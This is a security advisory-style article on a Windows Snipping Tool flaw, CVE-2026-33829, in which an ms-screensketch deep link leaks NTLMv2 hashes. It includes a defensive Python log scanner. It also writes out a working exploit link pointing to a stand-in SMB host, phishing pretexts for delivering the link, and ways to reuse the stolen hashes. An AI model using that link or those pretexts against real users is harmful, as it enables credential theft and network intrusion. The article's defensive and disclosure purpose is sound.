A critical-grade social engineering risk disguised as a moderate-severity flaw. Here’s everything you need to know about the Windows Snipping Tool NTLM credential leak vulnerability.
Microsoft patched a newly disclosed information disclosure vulnerability in the Windows Snipping Tool on April 14, 2026, as part of its monthly Patch Tuesday security update.
Tracked as CVE-2026-33829, this flaw allows remote attackers to silently steal NTLMv2 authentication hashes from unsuspecting users through nothing more than a cleverly crafted link.
While rated moderate in severity, security researchers warn that the real-world exploitation risk is substantially higher, especially in enterprise environments, where NTLM credential theft can fuel lateral movement and privilege-escalation campaigns.
CVE-2026-33829: Windows Snipping Tool Leak
CVE-2026-33829 is classified as a sensitive information exposure (CWE-200) vulnerability and carries a CVSS 3.1 base score of 4.3, placing it at moderate severity.
The vulnerability originates from how the Windows Snipping Tool processes deep links through its registered URI scheme, ms-screensketch.
The application’s filePath parameter, which is designed to load an image file into the editor, fails to perform proper input validation before initiating a remote connection.
An attacker can exploit this by setting filePath to a UNC path pointing to an attacker-controlled SMB server, causing Windows to initiate an authenticated SMB handshake and leak the user’s Net-NTLMv2 hash in the process.
Exploiting CVE-2026-33829 is deceptively simple and requires no special privileges on the part of the attacker. The attack chain unfolds as follows:
- Attacker sets up a rogue SMB listener on a publicly accessible server to capture incoming NTLM authentication responses
- A malicious URL is crafted using the ms-screensketch deep link scheme, with filePath pointing to the attacker’s SMB share, for example: `ms-screensketch:edit?&filePath=\\attacker.server\file.png&isTemporary=false&saved=true&source=Toast`
- The victim is lured into clicking the link via a phishing email, compromised website, or social media message
- Windows prompts the user to confirm opening the Snipping Tool, a seemingly harmless action
- Snipping Tool silently initiates an outbound SMB connection to the attacker’s server, transmitting the user’s NTLMv2 hash without any visible indication.
The attack is network-based, low-complexity, and requires only a single user click to succeed.
Social Engineering Potential
What makes CVE-2026-33829 particularly dangerous is its deceptive plausibility. Because the Snipping Tool actually opens as expected after the victim clicks the link, there is no visible sign that anything malicious has occurred.
Threat actors can exploit this invisibility through realistic pretexts such as:
- Asking employees to crop or edit a corporate wallpaper or badge photo
- Hosting a URL resembling a legitimate image CDN link (e.g., https://snip.example.com/wallpaper/image.png) that secretly serves an HTML page, auto-triggering the deep link
- Embedding malicious links in HR communications, IT support tickets, or internal wikis to maximize credibility
The victim sees the familiar Snipping Tool interface, while NTLM authentication occurs invisibly in the background, making this one of the more socially potent phishing vectors disclosed in recent months.
Impact of NTLMv2 Hash Theft
Although Microsoft classifies the vulnerability as “moderate” and states exploitation is “unlikely,” security experts highlight that NTLMv2 hash exposure carries compounding risks beyond the initial leak. Captured hashes can be weaponized in multiple ways:
- Pass-the-Hash (PtH) attacks – Reusing captured hashes to authenticate as the victim without knowing the plaintext password
- NTLM relay attacks – Forwarding captured authentication to other internal services to gain unauthorized access
- Offline hash cracking – Using tools like Hashcat to brute-force the Net-NTLMv2 hash into a cleartext password
- Lateral movement – Using compromised credentials to pivot across enterprise systems, escalating access progressively
Notably, the attack results in a loss of confidentiality but does not grant write access or affect system availability. However, in enterprise environments where NTLM is still widely used, a single leaked hash can be the entry point for a full network compromise.
Affected Platforms and Patch Details
CVE-2026-33829 affects 31 platform variants across Windows 10, Windows 11, and Windows Server. Microsoft confirmed that no workarounds exist, and patching is the only fix.
| Platform | Affected Versions | KB Update |
|---|---|---|
| Windows 11 | 23H2, 24H2, 25H2, 26H1 | KB5082052, KB5083769, KB5083768 |
| Windows 11 | 21H2, 22H2 | KB5082200 |
| Windows 10 | 1607, 1809 | KB5082198, KB5082123 |
| Windows Server | 2025, 2022, 2019, 2016, 2012 | KB5082063, KB5082142, KB5082123, KB5082126 |
A public proof-of-concept (PoC) exploit was released on April 20, 2026, raising the urgency for immediate patching. The April 2026 Patch Tuesday addressed 163–164 CVEs, including two zero-day vulnerabilities, making it one of Microsoft’s largest monthly update releases in recent memory.
Immediate Mitigation
- Apply the April 14, 2026, security updates immediately via Windows Update or the Microsoft Update Catalog.
- Block outbound SMB traffic (TCP port 445) at the firewall level to prevent external NTLM coercion
- Consider turning off NTLM authentication in environments that support Kerberos-only workflows via Group Policy.
- Deploy Microsoft Defender XDR detection rules to monitor for anomalous ms-screensketch URI invocations
- Train employees to recognize social engineering pretexts that involve clicking image or file links from unknown sources.
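As an added example (not code from the original article or from Microsoft), the following Python scanner illustrates the monitoring step above and the attack chain described earlier: it parses ms-screensketch deep links found in log lines and flags any whose filePath is a UNC path to a remote host, which is the condition that triggers the outbound SMB authentication. The log line format, the user names and the host attacker.server (taken from the example link) are constructed sample data.

```python
import re
from urllib.parse import parse_qs, unquote

SCHEME = "ms-screensketch"
# Matches \\host\share... or //host/share... (UNC in either separator style); group 1 = host
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)(?:[\\/]|$)")
# Pulls deep links out of free-form text such as proxy or mail-gateway log lines
LINK_RE = re.compile(r"ms-screensketch:[^\s\"'<>]+", re.IGNORECASE)

# Constructed sample log lines (not real telemetry); line 1 carries the article's example link
SAMPLE_LOG = [
    r'ts=2026-04-21T09:12:03Z user=alice url="ms-screensketch:edit?&filePath=\\attacker.server\file.png&isTemporary=false&saved=true&source=Toast"',
    r'ts=2026-04-21T09:15:44Z user=bob url="ms-screensketch:edit?filePath=C:\Users\bob\Pictures\badge.png&isTemporary=false"',
    r'ts=2026-04-21T09:16:10Z user=carol url="https://intranet.example/wiki/snipping-tool-howto"',
]

def parse_deep_link(url):
    """Split an ms-screensketch link into its action (e.g. 'edit') and its query parameters."""
    if not url.lower().startswith(SCHEME + ":"):
        raise ValueError("not an ms-screensketch deep link")
    action, _, query = url[len(SCHEME) + 1:].partition("?")
    # parse_qs skips the empty pair produced by the leading '&' and percent-decodes values
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    return {"action": action, "params": params}

def remote_host(path):
    """Return the host a filePath would contact if it is a UNC path, otherwise None."""
    m = UNC_RE.match(unquote(path).strip())  # unquote again to catch double-encoded paths
    return m.group(1) if m else None

def assess(url):
    """Classify one deep link: suspicious when filePath points at a remote (SMB) host."""
    info = parse_deep_link(url)
    path = info["params"].get("filePath", "")
    host = remote_host(path)
    return {"action": info["action"], "file_path": path,
            "remote_host": host, "suspicious": host is not None}

def scan_lines(lines):
    """Return (line_number, assessment) for every link whose filePath targets a remote host."""
    findings = []
    for n, line in enumerate(lines, 1):
        for link in LINK_RE.findall(line):
            result = assess(link)
            if result["suspicious"]:
                findings.append((n, result))
    return findings

for n, result in scan_lines(SAMPLE_LOG):
    print(f"line {n}: filePath would authenticate to {result['remote_host']} (NTLM leak risk)")
```

A local path such as C:\Users\... is not flagged, so the rule fires only on the remote-share case the vulnerability depends on.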
FAQ
Q1: What is CVE-2026-33829?
CVE-2026-33829 is a Windows Snipping Tool vulnerability that leaks a user’s NTLMv2 authentication hash to a remote attacker-controlled SMB server via the ms-screensketch URI scheme.
Q2: Which Windows versions are affected by CVE-2026-33829?
The vulnerability affects Windows 10, Windows 11 (all recent versions), and multiple Windows Server editions (2012 through 2025), totaling 31 distinct platform variants.
Q3: Has CVE-2026-33829 been exploited in the wild?
As of April 2026, Microsoft has not confirmed any active in-the-wild exploitation, though a public PoC was released on April 20, 2026, increasing the risk of imminent abuse.
Q4: How do I fix the CVE-2026-33829 Snipping Tool vulnerability?
Install the April 14, 2026, Patch Tuesday security updates (e.g., KB5083769 for Windows 11 24H2/25H2). No workarounds exist, making patching the only confirmed remediation.